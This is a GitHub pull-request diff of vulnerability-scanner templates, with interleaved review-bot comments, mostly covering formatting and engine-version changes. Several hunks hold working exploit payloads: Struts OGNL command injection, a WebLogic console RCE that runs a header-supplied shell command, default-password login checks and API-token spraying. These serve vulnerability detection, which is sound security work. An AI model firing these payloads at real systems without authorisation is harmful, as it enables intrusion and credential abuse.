Merge pull request #2844 from projectdiscovery/more-fixes

Changes to adopt v2.5.3 engine
patch-1
Sandeep Singh 2021-10-21 07:21:20 +05:30 committed by GitHub
commit a21cec6362
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
85 changed files with 129 additions and 79 deletions


@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution # files is a list of files to ignore template execution
# unless asked for by the user. # unless asked for by the user.
files:
- "token-spray/"


@ -11,25 +11,19 @@ info:
requests: requests:
- raw: - raw:
- | - |
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close
Accept: */* Accept: */*
Accept-Language: en
- | - |
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close
Accept: */* Accept: */*
Accept-Language: en
- | - |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close
Accept: */* Accept: */*
Accept-Language: en
payloads: payloads:
params: params:
@ -40,11 +34,12 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
condition: or
status: status:
- 200 - 200
- 400 - 400
condition: or
- type: regex - type: regex
part: body
regex: regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
part: body


@ -91,15 +91,16 @@ requests:
- webviewer - webviewer
- welcome - welcome
attack: sniper
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
condition: and
words: words:
- "environment variable" - "environment variable"
- "display library search paths" - "display library search paths"
condition: and


@ -22,14 +22,16 @@ requests:
payloads: payloads:
ids: helpers/wordlists/numbers.txt ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50 threads: 50
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "<title>Dashboard</title>" - "<title>Dashboard</title>"


@ -28,8 +28,7 @@ requests:
- | - |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
cmd: §exec§ cmd: {{exec}}
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@ -41,12 +40,12 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
condition: or
regex: regex:
- "root:.*:0:0:" - "root:.*:0:0:"
- "\\[(font|extension|file)s\\]" - "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status - type: status
status: status:


@ -31,11 +31,12 @@ requests:
command: command:
- "systeminfo" # Windows - "systeminfo" # Windows
- "lsb_release -a" # Linux - "lsb_release -a" # Linux
attack: sniper
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
condition: or
regex: regex:
- "OS Name:.*Microsoft Windows" - "OS Name:.*Microsoft Windows"
- "Distributor ID:" - "Distributor ID:"


@ -22,6 +22,8 @@ requests:
path: path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}" - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
skip-variables-check: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
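Review bot: `skip-variables-check: true` is added without a comment saying why, and the reason is not obvious from the template itself: `{{228*'98'}}` in the two paths is the template-injection expression being sent to the target, and the engine's unresolved-variable check would presumably treat it as a missing nuclei variable and skip the template. A comment above the new key, `# {{228*'98'}} is the SSTI probe, not a nuclei variable - keep the variable check disabled`, would stop a later cleanup from removing the flag. The same applies to the CSRF-TOKEN cookie section near the end of this PR, which adds the flag for the `{{shell_exec(...)}}` probe.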


@ -1,4 +1,5 @@
id: grafana-default-login id: grafana-default-login
info: info:
name: Grafana Default Login name: Grafana Default Login
author: pdteam author: pdteam
@ -26,7 +27,6 @@ requests:
username: username:
- admin - admin
- admin - admin
password: password:
- prom-operator - prom-operator
- admin - admin
@ -35,15 +35,13 @@ requests:
matchers: matchers:
- type: word - type: word
words: words:
- grafana_session - "grafana_session" # Login cookie
part: header part: header
# Check for 'grafana_session' cookie on valid login in the response header.
- type: word - type: word
words:
- Logged in
part: body part: body
# Check for valid string on valid login. words:
- "Logged in" # Logged in keyword
- type: status - type: status
status: status:
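Review bot: The `@ -26,7 +27,6 @@` hunk removes one line that this view does not show, while its visible payloads keep `username` and `password` as two equal-length lists (`admin`,`admin` against `prom-operator`,`admin`), a layout that only yields the intended admin:prom-operator and admin:admin pairs under `attack: pitchfork`. This PR drops `attack: sniper` elsewhere because sniper is the engine default, but pitchfork is not; if the hidden deletion is the `attack:` line, the template silently falls back to the default mode and tries a different credential set. Please confirm which line was removed, and keep `attack: pitchfork` if it was that one.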


@ -20,15 +20,13 @@ requests:
username: username:
- admin - admin
attack: sniper
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
condition: and
words: words:
- '"redirect": "/htdocs/pages/main/main.lsp"' - '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""' - '"error": ""'
condition: and
- type: status - type: status
status: status:


@ -18,22 +18,21 @@ requests:
payloads: payloads:
password: password:
- 12345 - "12345"
attack: sniper
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
condition: and
words: words:
- "session_id=" - "session_id="
- "resource" - "resource"
condition: and
- type: word - type: word
words:
- "Invalid Password"
part: body part: body
negative: true negative: true
words:
- "Invalid Password"
- type: status - type: status
status: status:


@ -23,17 +23,17 @@ requests:
payloads: payloads:
path: helpers/wordlists/adminer-paths.txt path: helpers/wordlists/adminer-paths.txt
attack: sniper
threads: 50 threads: 50
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
condition: and
words: words:
- "- Adminer</title>" - "- Adminer</title>"
- "partial(verifyVersion, " - "partial(verifyVersion"
condition: and
- type: status - type: status
status: status:
- 200 - 200


@ -14,12 +14,10 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}} Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9 Accept-Language: en-US,en;q=0.9
Connection: close
payloads: payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt mdbPaths: helpers/wordlists/mdb-paths.txt
attack: sniper
threads: 50 threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true stop-at-first-match: true


@ -1,4 +1,5 @@
id: prestashop-module-fuzz id: prestashop-module-fuzz
info: info:
name: Prestashop Modules Enumeration name: Prestashop Modules Enumeration
author: meme-lord author: meme-lord
@ -16,19 +17,18 @@ requests:
payloads: payloads:
path: helpers/wordlists/prestashop-modules.txt path: helpers/wordlists/prestashop-modules.txt
attack: sniper
threads: 50
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
condition: and
words: words:
- "<module>" - "<module>"
- "<name>" - "<name>"
- "<displayName>" - "<displayName>"
- "<is_configurable>" - "<is_configurable>"
- "</module>" - "</module>"
condition: and
- type: status - type: status
status: status:


@ -1,4 +1,5 @@
id: wordpress-plugins-detect id: wordpress-plugins-detect
info: info:
name: WordPress Plugins Detection name: WordPress Plugins Detection
author: 0xcrypto author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads: payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt pluginSlug: helpers/wordlists/wordpress-plugins.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
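Review bot: Going by the hunk counts (11 old lines, 8 new, with `threads: 50` moved), the lines dropped here appear to be `attack: sniper`, `redirects: true` and `max-redirects: 1`; I cannot see the side markers in this view, so treat this as inferred. Removing `attack: sniper` is a no-op since it is the engine default, but dropping the two redirect keys changes behaviour: a plugin path that answers with a 301/302 is no longer followed, so the status matcher below never sees the final 200. If that is intended (fewer false positives from catch-all redirects) the PR description should say so; otherwise `redirects: true` and `max-redirects: 1` should stay. The wordpress-themes-detect section that follows has the same deletion.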


@ -1,4 +1,5 @@
id: wordpress-themes-detect id: wordpress-themes-detect
info: info:
name: WordPress Theme Detection name: WordPress Theme Detection
author: 0xcrypto author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads: payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt themeSlug: helpers/wordlists/wordpress-themes.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status


@ -14,6 +14,7 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
payloads: payloads:
path: path:
- / - /
@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/ - /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport - /adfs/services/trust/2005/windowstransport
attack: sniper
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl


@ -1,15 +1,19 @@
## About ## About
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage ## Usage
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
```bash token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
# Run Nuclei specifying all the api templates:
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest ```console
# Running token-spray templates against a single token to test
nuclei -t token-spray/ -var token=random-token-to-test
# Running token-spray templates against a file containing multiple new line delimited tokens
nuclei -t token-spray/ -var token=file_with_tokens.txt
``` ```
## Credits ## Credits
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,asana tags: token-spray,asana
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
@ -16,6 +17,6 @@ requests:
matchers: matchers:
- type: status - type: status
negative: true
status: status:
- 401 - 401
negative: true
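Review bot: `self-contained: true` is added to this template and to every other token-spray template below it without a comment saying what it implies: the request URL is static and the only input is `{{token}}` supplied through `-var token`. The `.nuclei-ignore` hunk at the top of this PR appears to drop the `token-spray/` exclusion, so these templates would now be selected in default template sets and presumably rely on the engine's unresolved-variable check to skip them when no token is given; a line such as `# self-contained: static API URL, the only input is -var token` next to the new key would make that dependency explicit for anyone reading one template in isolation.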


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,bing,maps,bingmaps tags: token-spray,bing,maps,bingmaps
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,bitly tags: token-spray,bitly
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,buildkite tags: token-spray,buildkite
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,buttercms tags: token-spray,buttercms
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,calendly tags: token-spray,calendly
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,circle,circleci tags: token-spray,circle,circleci
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,deviantart tags: token-spray,deviantart
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,dropbox tags: token-spray,dropbox
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,github tags: token-spray,github
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,autocomplete tags: token-spray,google,autocomplete
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,search tags: token-spray,google,search
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,directions tags: token-spray,google,directions
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,elevation tags: token-spray,google,elevation
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging tags: token-spray,google,fcm,firebase,cloud,messaging
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,find,text tags: token-spray,google,find,text
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,distance,matrix tags: token-spray,google,distance,matrix
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,geocode tags: token-spray,google,geocode
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,19 +6,21 @@ info:
severity: info severity: info
tags: token-spray,google,geolocation tags: token-spray,google,geolocation
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
matchers-condition: and
matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
negative: true
words: words:
- 'error' - 'error'
negative: true
- type: status - type: status
negative: true
status: status:
- 404 - 404
negative: true


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,maps,embed tags: token-spray,google,maps,embed
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,maps,embed tags: token-spray,google,maps,embed
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,search,nearby tags: token-spray,google,search,nearby
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,roads tags: token-spray,google,roads
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,place,details tags: token-spray,google,place,details
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,places,photo tags: token-spray,google,places,photo
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,playable,locations tags: token-spray,google,playable,locations
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,route tags: token-spray,google,route
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,speed,limit tags: token-spray,google,speed,limit
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,maps tags: token-spray,google,maps
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,streetview tags: token-spray,google,streetview
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,timezone tags: token-spray,google,timezone
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,search,places,text tags: token-spray,google,search,places,text
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
@ -14,6 +15,6 @@ requests:
matchers: matchers:
- type: word - type: word
part: body part: body
negative: true
words: words:
- 'error_message' - 'error_message'
negative: true


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,heroku tags: token-spray,heroku
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:
@ -17,9 +18,9 @@ requests:
matchers: matchers:
- type: status - type: status
condition: or
status: status:
- 200 - 200
- 201 - 201
- 202 - 202
- 206 - 206
condition: or


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,hubspot tags: token-spray,hubspot
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,instagram,graph tags: token-spray,instagram,graph
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,ipstack tags: token-spray,ipstack
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,iterable tags: token-spray,iterable
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,jumpcloud tags: token-spray,jumpcloud
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,lokalise tags: token-spray,lokalise
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,loqate tags: token-spray,loqate
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,mailchimp tags: token-spray,mailchimp
self-contained: true
network: network:
- inputs: - inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,mailgun tags: token-spray,mailgun
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,mapbox tags: token-spray,mapbox
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,newrelic,nerdgraph tags: token-spray,newrelic,nerdgraph
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,node,npm,package,manager tags: token-spray,node,npm,package,manager
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,weather,openweather tags: token-spray,weather,openweather
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,pagerduty tags: token-spray,pagerduty
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,pendo tags: token-spray,pendo
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,pivotaltracker tags: token-spray,pivotaltracker
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,postmark tags: token-spray,postmark
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,sendgrid tags: token-spray,sendgrid
self-contained: true
network: network:
- inputs: - inputs:
- data: "ehlo\r\n" - data: "ehlo\r\n"


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,slack tags: token-spray,slack
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,sonarcloud tags: token-spray,sonarcloud
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,spotify tags: token-spray,spotify
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,square tags: token-spray,square
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,stripe tags: token-spray,stripe
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,tinypng tags: token-spray,tinypng
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:


